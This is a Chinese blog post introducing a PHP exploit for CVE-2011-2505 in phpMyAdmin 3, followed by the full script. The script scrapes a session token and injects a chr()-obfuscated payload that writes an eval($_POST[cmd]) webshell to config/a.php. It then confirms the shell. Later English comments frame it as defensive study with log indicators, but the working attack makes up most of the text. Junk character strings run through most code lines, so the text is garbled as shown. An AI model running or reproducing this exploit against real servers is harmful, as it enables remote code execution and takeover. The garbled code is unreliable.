最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp,代码如下:

#!/usr/bin/php
; N' u9 W# h. }/ e. |( y<?php8 ~7 N) n: h6 ]2 j% S2 l5 c8 c0 @% u
// Historical proof-of-concept for CVE-2011-2505 in phpMyAdmin 3, kept here for
// defensive study: the request sequence below is what a web-log or WAF rule
// should recognise.  Mitigation: apply the vendor fix for CVE-2011-2505 and
// remove the setup/ and config/ directories from deployed installs.
print_r('- n3 ]9 Z8 z! n& r
+---------------------------------------------------------------------------+- Z* W* v" k8 m ~+ B+ U
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
2 n1 B, w1 w$ J: F; Aby oldjun(www.oldjun.com). O' w3 o- c% ?
welcome to www.t00ls.net
# A6 a& G+ W3 Omail: oldjun@gmail.com
Q: e8 q8 o5 A) H# w2 \" mAssigned CVE id: CVE-2011-2505
& [4 z- B F( _9 V+---------------------------------------------------------------------------+
R F5 F. c# D0 ]' r2 [7 k');. p7 [: {% Q- L3 `" ^
* k' Q! F3 ]/ L* P
/**
/ j4 o6 I% ?' Q9 y- v2 e6 M' D * working when the directory:"config" exists and is writeable.
 * Also relies on index.php handing a phpMyAdmin session cookie and a token
 * to a client that sends no cookie (see the regex further down).
8 \( }0 V1 W. j1 ^# E7 B6 F+ F**/8 Z) [; D* l* ~' \: {. w
1 U1 i' c! v* R! Z
// Positional CLI arguments.  Neither value is validated or escaped before it
// is concatenated into HTTP request lines by php_request().
if ($argc < 3) {
( P, C8 e, V# Z7 A5 ~( N7 \ print_r('
; w+ C4 ?; E! Y& f* T' N+---------------------------------------------------------------------------+
O1 _" u$ O1 x$ aUsage: php '.$argv[0].' host path- ?6 Y1 H# i0 i5 R) T
host: target server (ip/hostname)
3 V( T, Y9 u9 m w3 Vpath: path to pma3
# ?6 l" U2 q3 e) c( v! w: V8 JExample:
. ]& G; g. [0 [# H: d; v5 G1 x$ x$ {php '.$argv[0].' localhost /pma/
2 G* E N0 Y! L2 p2 V* m( u1 B+---------------------------------------------------------------------------+; P9 L8 ~1 M. n# p
');
" z3 {9 n+ m% l. D K+ {5 [ exit;
# {8 W. m8 g5 H& ~: {$ P}
" Y3 j% S' n+ p( S0 O6 w
// Read by php_request() through `global`; $path is used as a raw URL prefix.
4 s& t+ N) @- s- v I+ X+ O$host = $argv[1];
% w$ e& U* ~; P/ S$ a0 r- ~$path = $argv[2];; i0 G( p3 ?4 y- t) m# t/ z
0 D& I2 b0 X5 r$ s; _/**
, E, j! i/ a0 {2 n3 n * Try to determine if the directory:"config" exists6 R3 ~+ }+ O8 n9 f2 @8 t7 W" ?
 * Step 1: a plain GET of <path>config/.  Any "404" substring anywhere in the
 * raw response (status line, headers or body) is taken to mean "missing".
**/& `! n, T" p9 R* c" \( W, ?' p
echo "[+] Try to determine if the directory:config exists....\n";
1 @- V6 x3 t ^' C$returnstr=php_request('config/');* K9 t6 w* e% k, N* W! `, J
if(strpos($returnstr,'404')){, T7 \0 l/ |- N2 w' Y
exit("[-] Exploit Failed! The directory:config do not exists!\n");
+ m8 d8 I. E* R7 h}
# e; \4 [ t+ T2 a0 \; |6 t) s, A7 k1 Q2 J7 q v3 @5 u
/**: z' e }; k0 h1 E! y' `7 o* I
* Try to get token and sessionid- i7 L# t8 j/ E) l+ u
* Step 2: GET index.php with no cookie, then scrape a phpMyAdmin= cookie value
* (32-40 word chars) and a 32-char token= value out of the raw response.
* Both must be non-empty for the script to continue.
**/
9 R9 i8 c( n( G" P8 Mecho "[+] Try to get token and sessionid....\n";
# R9 h7 F1 h) r$result=php_request('index.php');
: p5 o7 Y2 _+ j" @) Z2 e9 U5 jpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp); R2 Y0 Q3 X# |% W3 L8 u
$token=$resp[3];
4 t+ O9 M5 @& J: ?+ v$sessionid=$resp[1];
: Q" I. Y4 Q8 Lif($token && $sessionid){
1 Q- a2 X: O! \. S echo "[+] token token\n";
4 |/ m! b% _, g9 d3 D echo "[+] Session ID sessionid\n";
5 H u9 _2 H* F: c" c5 o# E1 T+ p}else{. X7 X7 \$ U% |
exit("[-] Can't get token and Session ID,Exploit Failed!\n");* C5 q( N; [, h0 ^
}
3 ?; e7 x" A" M4 J3 [) e: Z2 M6 a
/**3 Q$ |5 i# O. |
* Try to insert shell into session
* Step 3 (the CVE-2011-2505 request): the injected value travels in the query
* string as a _SESSION[...] key alongside session_to_unset=, with the scraped
* token and session cookie attached.  That pair of parameter names in a GET
* query string is the indicator to alert on in access logs.
$ m/ n0 m6 O2 B ^9 E- k: M**/3 E- L% n. F/ \/ M8 Z" x& I6 ]
echo "[+] Try to insert shell into session....\n";
9 W- c6 W, L, @6 | f1 Kphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
# ? Z' W1 a/ }# L: z# h }6 a2 _5 C2 u3 H% n% T. v
/**
6 V: J" Z# C4 F. I% [, W * Try to create webshell+ I3 L& B3 O0 r0 V- h
 * Step 4: POST the setup script's "Save" form (submit_save=Save) with the
 * session cookie and token.  Per the author's comment this is the step that
 * materialises the shell; the check below reads config/config.inc.php, so the
 * save presumably writes that file -- confirm against the pma3 setup code.
 * A POST to setup/config.php on a production host is itself worth alerting on.
**/
: Y0 `6 O) n8 necho "[+] Try to create webshell....\n";1 j d1 C- C- i2 G7 x4 o" P
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);; x, Y& m: O, G7 b7 `
/**
% C4 Q/ z/ A% z! D * Try to check if the webshell was created successfully
 * Step 5: success is judged solely by the marker string 't00ls' appearing in
 * the raw response for config/config.inc.php (headers included).
' i9 f8 _ {6 X**/
+ w. z* m4 ^5 ]1 Decho "[+] Try to check if the webshell was created successfully....\n";% v# U. o' Y9 t
$content=php_request('config/config.inc.php');
5 ?" v. k5 y5 N( S2 T6 wif(strpos($content,'t00ls')){
' r( V6 {4 U- J* q3 r' P! p echo "[+] Congratulations! Expoilt successfully....\n";
: M6 v* ?8 Y+ S echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
/ X2 U/ _! c3 ]}else{
8 F7 ^ N4 [' M exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
0 W# b2 F1 ?% ?: e6 ^}
3 A) [$ d+ ]% f# m: C' ]
/**
 * Send one hand-built HTTP/1.1 request to $host on TCP port 80 (plaintext,
 * no TLS) and return the whole response -- status line, headers and body --
 * as one string, read until the peer closes the connection.
 *
 * @param string $url    path appended to the global $path verbatim (no escaping)
 * @param string $data   POST body; an empty/falsy value means a GET request
 * @param string $cookie raw Cookie header value; empty/falsy means no Cookie header
 * @return string raw response bytes
 *
 * Reads $host and $path from globals.  On connection failure it prints a
 * message and calls die, so callers never see a failed connect.
 * NOTE(review): the fixed MSIE 6 User-Agent and "Connection: Close" header are
 * constant strings, which makes this traffic easy to fingerprint in web logs.
 */
$ A3 R: \5 l& [/ j. }, T* Lfunction php_request($url,$data='',$cookie=''){6 `# B" M0 f2 D; Z
global $host, $path;
/ C! F" T+ `$ z3 b \3 }% N # m+ m& L+ n, |% i
// Method is chosen by truthiness of $data, not by an explicit flag.
$method=$data?'POST':'GET';
: o+ U6 @7 s; K' v, S6 X
! T2 S9 J$ n9 Z w: d' N" z! F2 u; r $packet = $method." ".$path.$url." HTTP/1.1\r\n";
; u6 J! ?& A9 G $packet .= "Accept: */*\r\n";5 @2 e% s2 V& }2 Q/ I j
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
( s9 D# E" j' G% R, C2 Q) h T $packet .= "Host: $host\r\n";
// Content-Type / Content-Length are only emitted for POST bodies.
8 B. k+ D& z- W3 T $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";# U1 w2 `/ S. o6 k2 m- F
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
% Z, Q8 a1 R) T. X3 J! | o( M $packet .= $cookie?"Cookie: $cookie\r\n":"";7 t/ O1 j" ?* g5 T1 C Y+ |
$packet .= "Connection: Close\r\n\r\n";
; F3 m. g& i+ B $packet .= $data?$data:"";
! w- N7 n; S m) N
// No timeout argument and no errno/errstr capture; a refused or hung connect
// is only reported as "No response".
7 u8 ]2 B- y! i- `! t $fp = fsockopen(gethostbyname($host), 80);" \: T& G ?# B1 F- ?2 \* ]: [
if (!$fp) {
: k% t$ Z& k2 j. H" \) T echo 'No response from '.$host; die;
) h" P' r; s. x u$ m, b' T% E! @+ e }
// Return value of fputs is not checked; a short write goes unnoticed.
: L# u+ c5 h' k2 s M+ _ fputs($fp, $packet);8 b5 D0 S- A# Z- w4 X5 F/ C* n* ]
3 P6 y4 w- j! h5 e3 K2 [! R
$resp = '';9 t- Z7 s9 k4 ~3 g: c# k, _
, l* P6 U# }8 R) y3 j$ g
// Read 1024-byte chunks until EOF; the socket is never explicitly closed.
while ($fp && !feof($fp))
, c O: [& Y: g; M $resp .= fread($fp, 1024);
?2 Z3 ^! I' B" G- Z, t8 Y) y7 v2 [! {2 J- o: o
return $resp;
$ M/ C. t& D2 v0 v7 W# r6 N}
' \6 [0 V+ g" F+ @7 t
, t; \5 ]! D1 l' [8 }2 h# U?> ) M0 H( i4 {% j& U" D/ C/ A
. |